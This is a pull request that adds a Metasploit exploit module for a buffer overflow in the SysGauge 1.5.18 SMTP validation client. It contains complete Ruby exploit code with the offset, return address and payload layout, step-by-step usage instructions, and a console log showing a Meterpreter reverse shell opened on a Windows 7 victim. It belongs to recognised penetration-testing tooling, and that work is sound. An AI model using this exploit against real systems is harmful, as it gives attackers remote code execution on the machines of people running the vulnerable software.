### PR TITLE
Add exploit module for SysGauge SMTP server validation buffer overflow

### DIFF
--- a/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
+++ b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
@@ -2,7 +2,7 @@
 
   This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
 via its SMTP server validation. The module sends a malicious response along in the
-220 service ready response and exploits the client resulting in an unpriviledged shell.
+220 service ready response and exploits the client resulting in an unprivileged shell.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
+++ b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
@@ -1,0 +1,39 @@
+## Vulnerable Application
+
+  This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
+via its SMTP server validation. The module sends a malicious response along in the
+220 service ready response and exploits the client resulting in an unpriviledged shell.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/windows/smtp/sysgauge_client_bof```
+  4. Do: ```set payload windows/meterpreter/reverse_tcp```
+  5. Do: ```set LHOST ip```
+  6. Do: ```run```
+  7. The user should put your `SRVHOST` or other applicable IP address in the SMTP configuration
+in the program, and hit the "Verify Email ..." button.
+  8. You should get a shell.
+
+## Scenarios
+
+  Here is how to typically execute the module. Note that the client must input this SMTP server
+  information under SysGauge Options and hit the "Verify Email ..." button.
+
+  ```
+  msf > use exploit/windows/smtp/sysgauge_client_bof
+  msf exploit(sysgauge_client_bof) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf exploit(sysgauge_client_bof) > set lhost 10.0.0.1
+  lhost => 10.0.0.1
+  msf exploit(sysgauge_client_bof) > exploit
+  [*] Exploit running as background job.
+  msf exploit(sysgauge_client_bof) >
+  [*] Started reverse TCP handler on 10.0.0.1:4444
+  [*] Server started.
+  [*] Client connected: 10.0.0.128
+  [*] Sending payload...
+  [*] Sending stage (957487 bytes) to 10.0.0.128
+  [*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.128:49165) at 2017-03-14 23:15:04 -0500
+  ```

--- a/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
+++ b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
@@ -1,8 +1,10 @@
 ## Vulnerable Application
 
-  This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
+  This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
 via its SMTP server validation. The module sends a malicious response along in the
-220 service ready response and exploits the client resulting in an unprivileged shell.
+220 service ready response and exploits the client, resulting in an unprivileged shell.
+
+  he software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe).
 
 ## Verification Steps
 

--- a/modules/exploits/windows/smtp/sysgauge_client_bof.rb
+++ b/modules/exploits/windows/smtp/sysgauge_client_bof.rb
@@ -1,0 +1,87 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# Fuzzer written by corelanc0d3r - <peter.ve [at] corelan.be>
+# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
+#
+##
+
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::TcpServer
+
+  def initialize()
+    super(
+      'Name'           => 'SysGauge SMTP Validation Buffer Overflow',
+      'Description'    => %q{
+        This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
+        via its SMTP server validation. The module sends a malicious response along in the
+        220 service ready response and exploits the client resulting in an unpriviledged shell.
+      },
+      'Author'         =>
+      [
+        'Chris Higgins', # msf Module -- @ch1gg1ns
+        'Peter Baris'
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+      [
+        [ 'EDB', '41479' ],
+      ],
+      'DefaultOptions' =>
+      {
+        'EXITFUNC' => 'thread'
+      },
+      'Payload'        =>
+      {
+        'Space' => 306,
+        'Smallest' => true,
+        'BadChars' => "\x00\x0a\x0d\x20"
+      },
+      'Platform'  => 'win',
+      'Targets'       =>
+      [
+        [ 'Windows Universal',
+          {
+            'Offset' => 176,
+            'Ret'    => 0x6527635E # call esp # QtGui4.dll
+          }
+        ]
+      ],
+      'Privileged'    => 'false',
+      'DisclosureDate' => 'Feb 28 2017',
+      'DefaultTarget' => 0
+      )
+    register_options(
+      [
+      OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
+      ], self.class)
+  end
+
+  def setup
+    super
+  end
+
+  def on_client_connect(c)
+    sploit =  "220 "
+    sploit += rand_text(target['Offset'])
+    # Can only use the last part starting from 232 bytes in
+    sploit += payload.encoded[232..-1]
+    sploit += rand_text(2)
+    sploit += [target.ret].pack('V')
+    sploit += rand_text(12)
+    sploit += make_nops(8)
+    # And the first part up to 232 bytes
+    sploit += payload.encoded[0..231]
+    sploit += "ESMTP Sendmail \r\n"
+
+    print_status("Client connected: " + c.peerhost)
+    print_status("Sending payload...")
+
+    c.put(sploit)
+  end
+
+end

--- a/modules/exploits/windows/smtp/sysgauge_client_bof.rb
+++ b/modules/exploits/windows/smtp/sysgauge_client_bof.rb
@@ -2,10 +2,6 @@
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 #
-# Fuzzer written by corelanc0d3r - <peter.ve [at] corelan.be>
-# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
-#
-##
 
 class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::TcpServer

--- a/modules/exploits/windows/smtp/sysgauge_client_bof.rb
+++ b/modules/exploits/windows/smtp/sysgauge_client_bof.rb
@@ -1,4 +1,4 @@
-##
+
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 #
@@ -13,13 +13,15 @@ require 'msf/core'
 class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::TcpServer
 
+  Rank = NormalRanking
+
   def initialize()
     super(
       'Name'           => 'SysGauge SMTP Validation Buffer Overflow',
       'Description'    => %q{
         This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
         via its SMTP server validation. The module sends a malicious response along in the
-        220 service ready response and exploits the client resulting in an unpriviledged shell.
+        220 service ready response and exploits the client resulting in an unprivileged shell.
       },
       'Author'         =>
       [

--- a/modules/exploits/windows/smtp/sysgauge_client_bof.rb
+++ b/modules/exploits/windows/smtp/sysgauge_client_bof.rb
@@ -1,4 +1,4 @@
-
+#
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 #
@@ -6,9 +6,6 @@
 # http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
 #
 ##
-
-
-require 'msf/core'
 
 class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::TcpServer
@@ -19,14 +16,14 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       'Name'           => 'SysGauge SMTP Validation Buffer Overflow',
       'Description'    => %q{
-        This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
+        This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
         via its SMTP server validation. The module sends a malicious response along in the
-        220 service ready response and exploits the client resulting in an unprivileged shell.
+        220 service ready response and exploits the client, resulting in an unprivileged shell.
       },
       'Author'         =>
       [
         'Chris Higgins', # msf Module -- @ch1gg1ns
-        'Peter Baris'
+        'Peter Baris'    # Initial discovery and PoC
       ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -40,7 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'Payload'        =>
       {
         'Space' => 306,
-        'Smallest' => true,
         'BadChars' => "\x00\x0a\x0d\x20"
       },
       'Platform'  => 'win',
@@ -53,32 +49,31 @@ class MetasploitModule < Msf::Exploit::Remote
           }
         ]
       ],
-      'Privileged'    => 'false',
+      'Privileged'    => false,
       'DisclosureDate' => 'Feb 28 2017',
       'DefaultTarget' => 0
       )
     register_options(
       [
       OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
-      ], self.class)
-  end
-
-  def setup
-    super
+      ])
   end
 
   def on_client_connect(c)
+    # Note here that the payload must be split into two parts.
+    # The payload gets jumbled in the stack so we need to split
+    # and align to get it to execute correctly.
     sploit =  "220 "
-    sploit += rand_text(target['Offset'])
+    sploit << rand_text(target['Offset'])
     # Can only use the last part starting from 232 bytes in
-    sploit += payload.encoded[232..-1]
-    sploit += rand_text(2)
-    sploit += [target.ret].pack('V')
-    sploit += rand_text(12)
-    sploit += make_nops(8)
+    sploit << payload.encoded[232..-1]
+    sploit << rand_text(2)
+    sploit << [target.ret].pack('V')
+    sploit << rand_text(12)
+    sploit << make_nops(8)
     # And the first part up to 232 bytes
-    sploit += payload.encoded[0..231]
-    sploit += "ESMTP Sendmail \r\n"
+    sploit << payload.encoded[0..231]
+    sploit << "ESMTP Sendmail \r\n"
 
     print_status("Client connected: " + c.peerhost)
     print_status("Sending payload...")


### PR DESCRIPTION
This module will setup a SMTP server expecting a connection from SysGauge 1.5.18 via its SMTP server validation. The module sends a malicious response along in the 220 service ready response and exploits the client resulting in an unprivileged shell.

## Verification

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/windows/smtp/sysgauge_client_bof```
  4. Do: ```set payload windows/meterpreter/reverse_tcp```
  5. Do: ```set LHOST ip```
  6. Do: ```run```
  7. The user should put your `SRVHOST` or other applicable IP address in the SMTP configuration
in the program, and hit the "Verify Email ..." button.
  8. You should get a shell.

```
msf > use exploit/windows/smtp/sysgauge_client_bof
msf exploit(sysgauge_client_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(sysgauge_client_bof) > set lhost 10.0.0.1
lhost => 10.0.0.1
msf exploit(sysgauge_client_bof) > exploit
[*] Exploit running as background job.
msf exploit(sysgauge_client_bof) >
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Server started.
[*] Client connected: 10.0.0.128
[*] Sending payload...
[*] Sending stage (957487 bytes) to 10.0.0.128
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.128:49165) at 2017-03-14 23:15:04 -0500

msf exploit(sysgauge_client_bof) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : WIN7X86
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid 
Server username: win7x86\chiggins
```